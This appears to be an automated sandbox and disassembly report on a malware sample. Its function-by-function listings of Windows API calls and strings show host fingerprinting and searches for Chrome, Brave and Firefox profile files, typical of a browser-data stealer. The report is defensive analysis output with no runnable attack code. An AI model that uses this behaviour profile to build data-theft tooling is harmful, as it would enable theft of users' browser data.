Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
Instruction ID: c21fa98171918094cad8016ab14d074fa3b0d03eebcf23f4c5cd87ca699471cc
Opcode Fuzzy Hash: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
Instruction Fuzzy Hash: 30F0E2B2641208FBE7189AA4AC49FAEB7ECE705B15F300448F504E7280D571AE40DAA1

Function 00731190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
Part of subcall function 007478E0: HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F

Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
Part of subcall function 00747850: HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F

ExitProcess.KERNEL32 ref: 007311C6

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: aa9a9566fa0b43574649f2a238c5673bea03859e6b931bfeff0fc569fcf381ba
Instruction ID: cc56c7f43beac40c48351313e904d24f80696370b8b7b40c6f2c10549534b698
Opcode Fuzzy Hash: aa9a9566fa0b43574649f2a238c5673bea03859e6b931bfeff0fc569fcf381ba
Instruction Fuzzy Hash: 38E012B6A2830993DA0477B0EC0EB2E339C5B54746F440824FA09D2113FF6DE840D666

Non-executed Functions

Function 007438B0 Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007438CC
FindFirstFileA.KERNEL32(?,?), ref: 007438E3
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00743935
StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
FindClose.KERNEL32(000000FF), ref: 00743C7C

Strings

%s\*, xrefs: 007438C0
P2#v, xrefs: 00743C67
%s%s, xrefs: 00743AAD
%s\%s, xrefs: 00743A6F
!=t, xrefs: 00743C82, 00743C45, 00743B69, 00743909, 00743B6C, 00743C48
%s\%s, xrefs: 0074397A
%s\%s\%s, xrefs: 00743A4A
1#v, xrefs: 007438E3

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: !=t$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2#v$1#v
API String ID: 1125553467-2019668089
Opcode ID: 7d3c949ec6a77a090772d556049b9dc388240f6762883938f82e3814e3e904f6
Instruction ID: cc1e202cf208ec8730f0801b544ecf1d5a01fede34e81c68acf36c938e360b1d
Opcode Fuzzy Hash: 7d3c949ec6a77a090772d556049b9dc388240f6762883938f82e3814e3e904f6
Instruction Fuzzy Hash: B7A124B2A14218ABDB24DF64DC89FEE7378FF84301F444588B61D96181EB759B84CF62

Function 0073BE70 Relevance: 40.9, APIs: 17, Strings: 6, Instructions: 675fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

FindFirstFileA.KERNEL32(00000000,?,00750B32,00750B2B,00000000,?,?,?,007513F4,00750B2A), ref: 0073BEF5
StrCmpCA.SHLWAPI(?,007513F8), ref: 0073BF4D
StrCmpCA.SHLWAPI(?,007513FC), ref: 0073BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0073C7BF
FindClose.KERNEL32(000000FF), ref: 0073C7D1

Strings

P2#v, xrefs: 0073C7BF
Brave, xrefs: 0073C102
\Brave\Preferences, xrefs: 0073C1DB
1#v, xrefs: 0073BEF5
Google Chrome, xrefs: 0073C634
Preferences, xrefs: 0073C11E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
API String ID: 3334442632-1392536997
Opcode ID: 5d58d9f1f8898b892f553f1a77255e36ddee6f226b4a771186fd76c0abb08d05
Instruction ID: 5a89ec39a60c5ad6776aae47721bd1272b8d6176c4b16b93317c896cdd100e9f
Opcode Fuzzy Hash: 5d58d9f1f8898b892f553f1a77255e36ddee6f226b4a771186fd76c0abb08d05
Instruction Fuzzy Hash: E6425772950104F7EB15FB70DD9AEED737DAF94300F404568B90AA6181EF38AB49CB92

Function 00744910 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0074492C
FindFirstFileA.KERNEL32(?,?), ref: 00744943
StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
FindClose.KERNEL32(000000FF), ref: 00744B92

Strings

P2#v, xrefs: 00744B7D
%s\*, xrefs: 00744920
%s\%s, xrefs: 007449FB
%s\%s, xrefs: 007449A4
1#v, xrefs: 00744943

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
API String ID: 180737720-322404123
Opcode ID: 9760baa6d42def941a280f8ec9f18d52e59f459b288440357b26494c95b97789
Instruction ID: 2311530cd7f3242952efb01b886909b6d6666fd765cf0b6a47f5ad3c9535c3e4
Opcode Fuzzy Hash: 9760baa6d42def941a280f8ec9f18d52e59f459b288440357b26494c95b97789
Instruction Fuzzy Hash: FE6148B2914218ABCB24EBA0DC49FEE737CBB88701F044588B50D96141EB75EB85DF91

Function 00744570 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
HeapAlloc.KERNEL32(00000000), ref: 00744587
wsprintfA.USER32 ref: 007445A6
FindFirstFileA.KERNEL32(?,?), ref: 007445BD
StrCmpCA.SHLWAPI(?,00750FC4), ref: 007445EB
StrCmpCA.SHLWAPI(?,00750FC8), ref: 00744601
FindNextFileA.KERNEL32(000000FF,?), ref: 0074468B
FindClose.KERNEL32(000000FF), ref: 007446A0
lstrcatA.KERNEL32(?,00FCD870,?,00000104), ref: 007446C5
lstrcatA.KERNEL32(?,00FD0790), ref: 007446D8
lstrlenA.KERNEL32(?), ref: 007446E5
lstrlenA.KERNEL32(?), ref: 007446F6

Strings

P2#v, xrefs: 0074468B
%s\%s, xrefs: 0074461B
%s\*, xrefs: 0074459A
1#v, xrefs: 007445BD

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*$P2#v$1#v
API String ID: 13328894-4226942003
Opcode ID: 308c93d7a138bbd86cb36cbbc01d84c7d7abfe459afb024180eaa8fefc487b81
Instruction ID: bc1a7e68fa6e2b7b0b4e8871f20ffa9fa5ea572f95fec94c85e5096bb40e766b
Opcode Fuzzy Hash: 308c93d7a138bbd86cb36cbbc01d84c7d7abfe459afb024180eaa8fefc487b81
Instruction Fuzzy Hash: EF5168B2954218ABCB64EB70DC89FED737CAB94300F404588F61D96191EB789BC4DF92

Function 00743EA0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00743EC3
FindFirstFileA.KERNEL32(?,?), ref: 00743EDA
StrCmpCA.SHLWAPI(?,00750FAC), ref: 00743F08
StrCmpCA.SHLWAPI(?,00750FB0), ref: 00743F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0074406C
FindClose.KERNEL32(000000FF), ref: 00744081

Strings

P2#v, xrefs: 0074406C
%s\%s, xrefs: 00743EB7
1#v, xrefs: 00743EDA

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$P2#v$1#v
API String ID: 180737720-1025293131
Opcode ID: 22bcb7c5f0b77e4d444b7c4cffdd4dac4c28292ea6079fce3d61fafccd36a09d
Instruction ID: 8f2ef8c6c3554a8a5a9394c48ebae0e6a2bd1cd05bcc65438d7ec523644f655e
Opcode Fuzzy Hash: 22bcb7c5f0b77e4d444b7c4cffdd4dac4c28292ea6079fce3d61fafccd36a09d
Instruction Fuzzy Hash: 7F514BB2914218EBCB24FBB0DC49EED737CBB94300F404588B65D96141DB79AB85DF91

Function 0073ED20 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0073ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0073ED55
StrCmpCA.SHLWAPI(?,00751538), ref: 0073EDAB
StrCmpCA.SHLWAPI(?,0075153C), ref: 0073EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0073F2AE
FindClose.KERNEL32(000000FF), ref: 0073F2C3

Strings

%s\*.*, xrefs: 0073ED32
P2#v, xrefs: 0073F2AE
1#v, xrefs: 0073ED55

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*$P2#v$1#v
API String ID: 180737720-3139634048
Opcode ID: 3a6ca9730eb3e1595631a754992207fb337bfd79557e566e7bc555aa1d6b473f
Instruction ID: e3e28e255a7afee9c9240c86800331f2da54a1659a9b1c24e3c6312d3b795ef8
Opcode Fuzzy Hash: 3a6ca9730eb3e1595631a754992207fb337bfd79557e566e7bc555aa1d6b473f
Instruction Fuzzy Hash: 30E1FF72951118EAFB55FB60DC56EEE737CAF54300F4041A9B50A62092EF386F8ACF52

Function 0073DE10 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00750C2E), ref: 0073DE5E
StrCmpCA.SHLWAPI(?,007514C8), ref: 0073DEAE
StrCmpCA.SHLWAPI(?,007514CC), ref: 0073DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0073E3E0
FindClose.KERNEL32(000000FF), ref: 0073E3F2

Strings

P2#v, xrefs: 0073E3E0
\*.*, xrefs: 0073DE26
4s, xrefs: 0073DE32, 0073E400, 0073DEF3, 0073DE75, 0073DEF6
1#v, xrefs: 0073DE5E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4s$P2#v$\*.*$1#v
API String ID: 2325840235-1418641074
Opcode ID: 27aa49988e4663ac981dab8452e7a33c13095a03bce54d01459e136611eabd6b
Instruction ID: 43ad3de068561cc51e74635bd97923e93ba1983d4f4b7ed39cb7853d7c6a3f7a
Opcode Fuzzy Hash: 27aa49988e4663ac981dab8452e7a33c13095a03bce54d01459e136611eabd6b
Instruction Fuzzy Hash: 39F1BF71954118EAEB16EB60DC99EEE737CFF54304F8141E9A40A62091EF386F89CF52

Function 0073F6B0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
FindClose.KERNEL32(000000FF), ref: 0073FAC3

Strings

P2#v, xrefs: 0073FAB1
prefs.js, xrefs: 0073F812
1#v, xrefs: 0073F71E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: P2#v$prefs.js$1#v
API String ID: 3334442632-2885088814
Opcode ID: f55ddb1589fb90f568e89f5ad9a5d6d906caae815867ce6fee0991a4a9808943
Instruction ID: 948bdc1b26fad37a3a4c2b7bfea590bf62f7bfd5c490e62c9f730e4f416462ae
Opcode Fuzzy Hash: f55ddb1589fb90f568e89f5ad9a5d6d906caae815867ce6fee0991a4a9808943
Instruction Fuzzy Hash: 53B13671950108EBEB25FF60DC5ABEE7379AF54300F4085A8E40A96152EF386B49CF92

Function 0073DA80 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007514B0,00750C2A), ref: 0073DAEB
StrCmpCA.SHLWAPI(?,007514B4), ref: 0073DB33
StrCmpCA.SHLWAPI(?,007514B8), ref: 0073DB49
FindNextFileA.KERNEL32(000000FF,?), ref: 0073DDCC
FindClose.KERNEL32(000000FF), ref: 0073DDDE

Strings

P2#v, xrefs: 0073DDCC
1#v, xrefs: 0073DAEB

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: P2#v$1#v
API String ID: 3334442632-762677545
Opcode ID: 251cae7e3d2fa4bea9819a1f7ff99dc7a41eeedc5c79dd54f606028edb37af5f
Instruction ID: 0a3a41a023dc791a8730fdbf4317286e0c6f9536161bf8526689472fab7ab1cb
Opcode Fuzzy Hash: 251cae7e3d2fa4bea9819a1f7ff99dc7a41eeedc5c79dd54f606028edb37af5f
Instruction Fuzzy Hash: 7F9146B2950104EBEB15FB70EC5A9ED737DAB84300F408568F90A96141EF3C9B59CB93

Function 007316D0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0075516C,?,00731F2C,?,00755214,?,?,00000000,?,00000000), ref: 00731923
StrCmpCA.SHLWAPI(?,007552BC), ref: 00731973
StrCmpCA.SHLWAPI(?,00755364), ref: 00731989
